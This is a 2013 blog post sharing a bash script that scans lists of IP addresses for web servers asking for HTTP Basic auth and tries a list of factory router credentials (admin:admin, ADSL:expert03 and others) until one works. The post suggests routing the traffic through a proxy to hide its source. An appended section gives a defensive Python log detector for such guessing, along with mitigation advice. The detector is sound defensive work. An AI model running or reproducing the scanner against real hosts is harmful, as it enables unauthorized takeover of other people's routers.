Tuesday, January 22, 2013

find routers with default password


Entry moved here: http://wondershell.wordpress.com/2014/04/09/find-routers-with-default-password/

Another day, another script...

This script assumes you have a list of IP addresses stored in one file and a list of username:password pairs in another. Two variables inside the script let you limit the check to hosts that respond to ICMP echo requests, or display only those IPs that responded to ping. It is designed this way because some hosts do not respond to ICMP echo requests yet still have port 80 open.

Example content of username:password file:

  admin:admin
  admin:password
  admin:
  ADSL:expert03
  ZXDSL:ZXDSL
  admin:administrator
  admin:comcast
  admin:1234

Here is the script output when displaying all IPs and their statuses:

..and the other output, displaying only the 'Alive' ones:

  ALIVE means the host responded to ping.
  200 means the HTTP server response on port 80 was HTTP/1.* 200 OK.
  401 means the HTTP server requested authorisation - this is what we are looking for.

  Vertical bars after the 401 status indicate username:password pairs used to
  authenticate. If a correct pair is found, it is displayed after PASS.

Finally, the script itself:

#!/bin/bash

#=================#
#    VARIABLES    #
#=================#

  ips=`cat ip.list`
  users=`cat users.list`
  PING_CHECK=0
  DISPLAY_DEAD=1

# FOR ALL IP ADDRESSES IN THE FILE

for ip in $ips; do

  # IF  YOU WANT TO LIMIT THE CHECK TO ONLY 
  # REACHABLE BY ICMP SET PING_CHECK VARIABLE

  if [[ $PING_CHECK -eq 1 ]];then
    connection=`ping -W 1 -c 1 $ip | grep "1 packets" | grep -v "errors" | cut -d " " -f 6 | cut -b 1`
  else
    connection=0
  fi

  if [[ $connection -eq 0 ]]; then
    if [[ $PING_CHECK -eq 1 ]]; then

      # ALIVE MEANS REACHABLE BY PING

      echo -ne "\n $ip\t\033[1;32mALIVE\033[0m "; 
    else
      echo -ne "\n $ip\t";
    fi

    flag=0
    while [[ $flag -eq 0 ]]; do

    # SET THE CURL TO USE PROXY WITH -x PARAMETER 
    # OR RUN SCRIPT VIA PROXYCHAIN

      header=`curl --connect-timeout 3 -I -s $ip --location | head -1`
      web=`echo $header | grep " 200" | wc -w`
      auth=`echo $header | grep "HTTP/1.1 401" | wc -w`

      if [[ $web -gt 1 ]]; then
        
        # HTTP/1.* 200 OK - WEB SERVER FOUND

        echo -ne "\t \033[37m-> 200\033[0m " 
      fi

      if [[ $auth -gt 1 ]]; then

        # HTTP/1.* 401 AUTHORIZATION REQUIRED

        echo -ne "\t \033[37m-> 401\033[0m " 


        # TRY AUTHENTICATE WITH COMMON USERNAMES 
        # AND PASSWORDS FROM $users FILE

        for user in $users; do
          passcheck=`curl --connect-timeout 3 -I -s -u $user $ip --location | head -1 | grep "HTTP/1.1 401" | wc -w`
          if [[ $passcheck -lt 1 && $flag -eq 0 ]]; then
            

            # DISPLAY PASSWORD IF FOUND

            echo -ne "\t\033[32mPASS: $user\033[0m"; 

            flag=1
            break;
          else
            echo -ne "\033[37m|\033[0m";
          fi
        done
      fi
      flag=1
    done
  else
    # IF YOU WANT TO SEE ALL IP ADDRESSES THAT ARE BEING CHECKED
    # SET $DISPLAY_DEAD
    if [[ $DISPLAY_DEAD -eq 1 ]]; then
      echo -ne "\n $ip\t\033[31mDEAD\033[0m ";
    fi
  fi
done
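What the script above looks like from the other side of the connection is worth knowing too. The following is an added example, not code from the original post: it reads web server access log lines in combined log format and flags source addresses that collect a burst of 401 responses within a short window, which is the footprint one 401 per username:password pair leaves on a device's HTTP log, and it notes when the burst ends in a 200 with an authenticated user (a pair worked). The log lines, the source addresses, the threshold of five 401s per 60 seconds and the function names are all constructed for this demo.

```python
"""Spot HTTP Basic-auth credential guessing in access logs (added example).

Each username:password attempt against a 401-protected management page shows
up as one 401 line from the same source; a successful pair shows up as a 200
line carrying the authenticated user name.  Thresholds below are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format.  The third field is the authenticated
# user, "-" when the request carried no valid credentials.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample: one legitimate user who mistyped once, and one source
# that walks a credential list and lands on admin.
SAMPLE_LOG = """\
198.51.100.4 - - [22/Jan/2013:10:14:50 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
198.51.100.4 - jsmith [22/Jan/2013:10:14:58 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Jan/2013:10:15:01 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - - [22/Jan/2013:10:15:01 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - - [22/Jan/2013:10:15:02 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - - [22/Jan/2013:10:15:02 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - - [22/Jan/2013:10:15:03 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - - [22/Jan/2013:10:15:03 +0000] "HEAD / HTTP/1.1" 401 0 "-" "curl/7.26.0"
203.0.113.7 - admin [22/Jan/2013:10:15:04 +0000] "HEAD / HTTP/1.1" 200 0 "-" "curl/7.26.0"
garbage line that does not parse
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "src": m.group("src"),
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "status": int(m.group("status")),
    }


def find_guessing_sources(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {src: {"attempts": total 401s, "succeeded": bool}} for every
    source that received at least `threshold` 401s inside one `window`."""
    recent = defaultdict(deque)   # src -> timestamps of 401s inside the window
    total_401 = defaultdict(int)  # src -> all 401s seen, for the report
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                      # skip unparseable lines, do not crash
        src = ev["src"]
        if ev["status"] == 401:
            total_401[src] += 1
            q = recent[src]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()               # slide the window forward
            if len(q) >= threshold:
                flagged.setdefault(src, {"attempts": 0, "succeeded": False})
            if src in flagged:
                flagged[src]["attempts"] = total_401[src]
        elif ev["status"] == 200 and src in flagged and ev["user"] != "-":
            # A 200 with a user name after a 401 burst: one of the pairs worked.
            flagged[src]["succeeded"] = True
    return flagged


if __name__ == "__main__":
    for src, info in find_guessing_sources(SAMPLE_LOG.splitlines()).items():
        outcome = "SUCCEEDED" if info["succeeded"] else "no success seen"
        print(f"{src}: {info['attempts']} x 401 in a burst, {outcome}")
```

Run against a real access log with `find_guessing_sources(open(path))`; the device-side mitigation is the one the credential list itself implies, namely that a factory username:password pair is only a finding while it is still set, so changing it and keeping the management interface off untrusted networks removes the 401 burst from the log altogether.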

